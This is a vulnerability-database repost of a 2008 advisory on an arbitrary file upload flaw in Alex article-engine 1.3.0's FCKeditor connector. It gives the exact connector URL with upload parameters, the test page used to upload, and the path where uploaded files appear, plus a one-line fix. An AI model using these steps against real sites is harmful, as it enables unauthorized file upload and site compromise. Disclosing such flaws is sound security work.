Lucene search

alexarticle-upload.txt

🗓️ 19 Nov 2008 00:00:00Reported by BatterType

packetstorm🔗 packetstormsecurity.com👁 28 Views

Alex article-engine V1.3.0 Arbitrary File Upload vulnerability discovered by Batter, allows unauthorized file uploads through editor connector. Solution: Restrict and grant trusted user access

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`########################################################################  
#  
# Yellow Flood Organization  
#  
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload  
#  
# Source: http://www.alexscriptengine.de/blog/category/article-engine/  
#  
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/  
#  
# Discover by: Batter  
#  
########################################################################  
  
  
  
####################  
- Vulnerability:  
####################  
  
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?  
  
Command=FileUpload&Type=File&CurrentFolder=/  
  
####################  
- Exploit:  
####################  
  
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html  
  
####################  
- how To use:  
####################  
  
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*  
  
####################  
- Solution:  
####################  
  
Restrict and grant only trusted users access to the resources.  
  
####################  
- Greets :  
####################  
  
THE.HACKER.ONE , Str0ke  
  
####################  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4